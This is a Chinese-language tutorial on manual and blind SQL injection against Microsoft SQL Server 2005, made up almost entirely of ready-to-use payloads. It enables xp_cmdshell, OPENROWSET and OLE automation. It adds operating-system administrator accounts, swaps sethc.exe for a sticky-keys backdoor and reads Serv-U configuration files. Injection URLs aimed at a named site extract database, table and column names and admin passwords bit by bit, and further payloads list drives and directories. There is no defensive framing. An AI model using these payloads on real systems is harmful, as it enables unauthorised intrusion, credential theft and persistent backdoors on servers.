1. 程式人生 > >MSSQL2005 手工盲注詳解

MSSQL2005 手工盲注詳解

MSSQL2005 手工盲注詳解

一.開啟擴充套件

1.開啟xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

2.開啟’OPENROWSET’

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--

查詢分析器裡執行

;database=c:/windows/system32/ias/ias.mdb',
'select shell("cmd.exe /c net user admin admin1234 /add")')

來利用沙盤來新增管理員

3.開啟’sp_oacreate’

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--

拷貝檔案d:/windows/explorer.exe 至sethc.exe

declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out ;exec sp_oamethod @o, 'copyfile',null,'d:/windows/explorer.exe' ,'c:/sethc.exe';

在查詢分析器裡執行

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:/WINdows/system32/cmd.exe /c net user xcode xcode /add'

這段程式碼就是利用SP_OAcreate來新增一個xcode的系統使用者 然後直接提升為管理員許可權

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:/Serv-U6.3/ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

這段程式碼就可以把ServUDaemon.ini裡的配置資訊全部顯示出來

二.有顯錯,暴。

and 0<(select count(*) from master.dbo.sysdatabases);--

折半法得到資料庫個數

and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--

依次提交 dbid = 2.3.4… 得到更多的資料庫名

and 0<(select count(*) name from employ.dbo.sysobjects where xtype='U');--

折半法得到表個數(假設暴出庫名employ)

and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');--

爆出一個表名

假設暴出表名為"employ_qj"則在上面語句上加條件 and name not in (‘employ_qj’ 以此一直加條件…

and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name = 'employ_qj'));--

爆出一個列名

假設暴出欄位名為"id"則在上面語句上加上條件 and name not is(‘id’) 以此一直加條件…

或者

爆庫語句

and (select top 1 isnull(cast([name] as nvarchar(500)),char(32))+char(124) from [master].[dbo].[sysdatabases] where dbid in (select top N dbid from [master].[dbo].[sysdatabases] order by dbid desc))=0--

爆表語句,somedb部份是所要列的資料庫

and (select top 1 cast(name as varchar(200)) from (select top N name from somedb.sys.all_objects where type=char(85) order by name) t order by name desc)=0--

爆欄位語句,爆表admin裡user='admin’的密碼段

And (Select Top 1 isNull(cast([password] as varchar(2000)),char(32))+char(124) From (Select Top N [password] From [somedb]..[admin] Where user='admin' Order by [password]) T Order by [password]Desc)=0--

三.無顯錯,盲注。

先說下SQL2005中的查詢方法

select * from master.dbo.sysdatabases                --查詢資料庫
select * from NetBook.dbo.sysobjects where xtype='u'    --

查詢資料庫NetBook裡的表

select * from NetBook.dbo.syscolumns where id=object_id('book') --

查詢book表裡的欄位

判斷許可權:

and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
and 1=(select IS_SRVROLEMEMBER('db_owner'))

盲注常規步驟:

判斷庫是否確實為MSSQL2005:

http://www.oldjun.com/oldjun.aspx?id=1 and substring((select @@version),22,4)='2005'

猜資料庫名:

先猜dbid:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1

根據dbid猜庫名,先猜出長度:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1

再逐位猜:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1

猜表名(假設庫名已經猜出為database):

可以嘗試先看有沒管理表:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '%admin%')=1

猜第一個,先長度:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and len(name)=9)=1

猜第一個表名,逐位猜:http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))>90)=1 猜第二個表名(假設第一個為table1): http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u' and name not in ('table1')) and ascii(substring(name,1,1))>90)=1 ...

猜欄位(假設表名已經猜出為table):

猜第一個欄位:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table')) and ascii(substring(name,1,1))>90)=1
猜第二個(假設第一個為column1)
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table') and name not in ('column1')) and ascii(substring(name,1,1))>90)=1

猜資料(假設要猜的欄位為name):

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.table where name in (select top 1 name from database_db.dbo.table) and ascii(substring(name,1,1))>90)=1

四.其他一些語句(列目錄)

1.檢視驅動器

建表p(i為自動編號,a記錄碟符類似"c:/",b記錄可用位元組,其它省略)

;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--
;insert p exec xp_availablemedia;--

列出所有驅動器並插入表p

and (select count(*) from p)>3;--折半法查出驅動器總數
and ascii(substring((select a from p where i=1),1,1))=67;--

折半法查出驅動器名(注asc©=67)
上面一般用於無顯錯情況下使用-------以此類推,得到所有驅動器名

and (select a from p where i=1)>3;--

報錯得到第一個驅動器名
上面一般用於顯錯情況下使用-------以此類推,得到所有驅動器名

;drop table p;--

刪除表p

2.檢視目錄

;create table pa(m nvarchar(255),i nvarchar(255));--

建表pa(m記錄目錄,i記錄深度)/

;insert pa exec xp_dirtree 'e:';--列出驅動器e並插入表pa
and (select count(*) from pa where i>0)>-1;--折半法查出i深度
and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--

報錯得到深度i=1的第一個目錄名
上面一般用顯錯且目錄名不為數字情況下使用-------(得到第二個目錄把"top 0"換為"top 1",換深度只換i就行)以此類推,得到e盤的所有目錄

and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--

折半法查出深度i=1的第一個目錄名的長度

and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--

折半法查出深度i=1的第一個目錄名的第一個字元長度
上面一般用無顯錯情況下使用-------(得到第二個目錄把"top 0"換為"top 1",換深度只換i就行)以此類推,得到e盤的所有目錄

;drop table pa;--

刪除表pa

經過上面的方法就可得到伺服器所有目錄(這裡為連線使用者有讀取許可權目錄)